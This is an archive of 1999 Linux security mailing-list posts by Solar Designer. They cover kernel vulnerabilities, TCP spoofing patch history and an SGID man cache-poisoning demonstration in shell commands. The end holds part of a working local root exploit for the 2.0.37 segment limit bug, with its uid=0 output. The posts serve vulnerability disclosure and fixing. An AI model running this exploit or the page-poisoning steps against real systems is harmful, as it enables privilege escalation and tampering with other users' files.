patches, and Pavel Kankovsky has offered another one.  Unfortunately,
both of them have some (different) disadvantages.  This problem isn't
fixed in 2.2.13pre7, and isn't likely to be any time soon. :-(

(2.2.12) (*)
We have now reverted to the behavior of chown(2) we had in 2.0: reset
SUID/SGID bits on ownership change even if done by root.  Until now,
Linux 2.2 didn't do that for root (and not even for CAP_FSETID, like
it was supposed to do), which allowed for some races that have been
discussed on the security-audit list a few months ago.

(2.0.38) (+)
Linux 2.0's version of process_unauthorized() forgot to check the
dumpable flag, so it was possible to access memory of a SUID process
a user has started, via PID re-use.  Linux 2.2 did the right thing,
and isn't vulnerable.

(2.0.37 with secure-linux-11) (+)
I don't like it when others fix their vulnerabilities silently, so I
won't do so myself. :-)  It was possible to bypass some restrictions
of CONFIG_SECURE_PROC via PID re-use in 2.0.36 and 2.0.37 kernels
with my patches.  I simply didn't re-check the code closely enough
when updating the patch for 2.0.36.  Thanks to Pavel Kankovsky for
noticing this.

(2.0.38) (2.2.12) (+)
User-space values of the instruction and stack pointers are available
via /proc, -- for every process in the system, and to everyone.  This
information should in fact be treated just as private as the address
space of the processes (such a patch will likely get into 2.2.13pre
soon).  Imagine a crypto algorithm implementation that does branches
based on its key bits.  Thanks to Thomas <[EMAIL PROTECTED]>, who has
reported this to me (but underestimated the impact).

One final note: I am still going to fix all 2.0.38 security issues
that are any serious, in my patches, for a few months more.

Signed,
Solar Designer



Re: Linux blind TCP spoofing, act II + others

1999-08-09 Thread Solar Designer

>
> It was put back into 2.0.35 because the "fix" caused interoperability
> problems with many other stacks.

I've discussed those interoperability problems with Alan (thanks!),
and have now updated my 2.0.37 patch to include a fix that shouldn't
cause them any more:

http://www.false.com/security/linux/

I must also thank Nergal for testing the patch.

Signed,
Solar Designer



Re: Linux blind TCP spoofing, act II + others

1999-08-05 Thread Solar Designer

Hello,

> I notified kernel mantainers in May, but they didn't seem interested.

Perhaps everyone cares about 2.2 and 2.3 only these days.

>   So, when an attacker sends (as a third packet of tcp handshake) a
> packet with too small ack_seq, the server sends no packets (doesn't it
> violate RFC793 ?). When a packet with too big ack_seq is sent, the server
> sends a packet (with a reset flag).

I've first heard of this behavior from Coder's IP-spoof.2.  He didn't
realize this was a bug until I told him, though.

My secure-linux patch for 2.0.33 included a fix for this (and a few
other bugfixes, all enabled with its CONFIG_SECURE_BUGFIX option):

+#ifdef CONFIG_SECURE_BUGFIX
+   return 0;
+#else
    return 1;
+#endif

That's the last "return" in tcp_ack(), in linux/net/ipv4/tcp_input.c.
A zero return from tcp_ack() means a failed handshake, and generates
an RST packet.  Then 2.0.34 came out, and some of my bugfixes got in,
including this one.  From patch-2.0.34.gz:

-   return 1;
+   return 0;

So, the version of my patch for 2.0.34 didn't need to fix this any
more.  Of course, I then based each future update of the patch on the
latest one, and never bothered to check for this bug again.

Now, after your post, I am looking at patch-2.0.35.gz:

-   return 0;
+   return 1;

So, the "feature" got re-introduced in 2.0.35.  I don't know of the
reason for this.  I can only guess that the other major TCP changes
in 2.0.35 were originally based on a version of the code older than
the one in 2.0.34, but only got into 2.0.35.  The other guess is, of
course, that this change caused problems in 2.0.34, but I doubt it.

>   Now let's recall another Linux feature. Many OSes (including Linux)
> assign to ID field of an outgoing IP datagram consecutive, increasing
> numbers (we forget about fragmentation here; irrelevant in this case). That

Somehow I didn't think of this at the time (was before this ID stuff
got to BugTraq), so I tried playing with packet count obtained from
the router via SNMP.  Never got my exploit reliable enough, though.

>   At the end of this post I enclosed an exploit; don't use it without
> the permission of the target host's admin. I tested it on 2.0.37, 36 and 30;
> probably all 2.0.x are affected. It requires libnet (which can be downloaded

Except for 2.0.34 and 2.0.33 with my patch, I believe.  I would
appreciate it if you could test the exploit on any of those, so that
I could put the fix back into my patch for 2.0.37.

Signed,
Solar Designer



SGID man

1999-08-02 Thread Solar Designer

>
> > Let me give an example: because man is setuid to the man uid, the binary
> > must be owned by uid man.
>
> That is why it should be setgid to man, and not setuid. sgid has the
> same benefits in added privileges for the user to read or write in
> special directories, but it is less obvious how to elevate these
> privileges to get more privileges.

I wouldn't normally post this, but while we're on the topic...
There's an ancient problem with SGID man that I keep seeing on
various systems.  For example, on Red Hat 5.2:

[ghost@alice ghost]$ ls -l /var/catman/cat1/id.1.gz
ls: /var/catman/cat1/id.1.gz: No such file or directory
[ghost@alice ghost]$ man id
Formatting page, please wait...
[ghost@alice ghost]$ ls -l /var/catman/cat1/id.1.gz
-r--rw-r--   1 ghost    man           806 Aug  1 06:14 /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ chmod u+w /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ echo haha | gzip > /var/catman/cat1/id.1.gz
[ghost@alice ghost]$ chmod u-w /var/catman/cat1/id.1.gz

The next day, another user wants to know how to use "id":

[luser@alice luser]$ man id

Guess what they will see.

Solutions?  We could change the permissions on those directories from
775 or 1777 (that's what I've seen on various systems) to 770, so
that group man is always required.  However, doing so would break
things, as the group is (and should be) dropped for many operations.
Some changes to the way man works would be required to support such
restricted permissions.  A workaround could be to preformat all the
man pages as root.  Finally, we could move to a SUID man, making the
binary immutable (non-portable, not backup friendly).  I don't like
any of these.

In my opinion, it is time to stop storing preformatted pages.  It is
no longer worth the risk.  CPUs got faster, man pages are the same.

Signed,
Solar Designer



Linux 2.0.37 segment limit bug

1999-07-12 Thread Solar Designer
	if (setrlimit(RLIMIT_FSIZE, &new))
		new.rlim_cur = old.rlim_cur;

	do {
		((int *)task)++;
	} while (task->pid != pid || task->uid != uid);

	if (task->rlim[RLIMIT_FSIZE].rlim_cur != new.rlim_cur) goto search;

	if (setrlimit(RLIMIT_FSIZE, &old)) {
		perror("setrlimit");
		return 1;
	}

	if (task->rlim[RLIMIT_FSIZE].rlim_cur != old.rlim_cur) goto search;

	printf("found at %p\nPatching the UID... ", task);

	task->uid = 0;
	setuid(0);
	setgid(0);
	setgroups(0, NULL);

	puts("done");

	execl("/usr/bin/id", "id", NULL);
	return 1;
}

Its output, with CONFIG_MAX_MEMSIZE=1800 (the very first example
given in linux/Documentation/more-than-900MB-RAM.txt):

Searching for the descriptor... found at 0x8f9068ac
Extending its limit... done
Searching for task_struct... found at 0x9157d810
Patching the UID... done
uid=0(root) gid=0(root)

Signed,
Solar Designer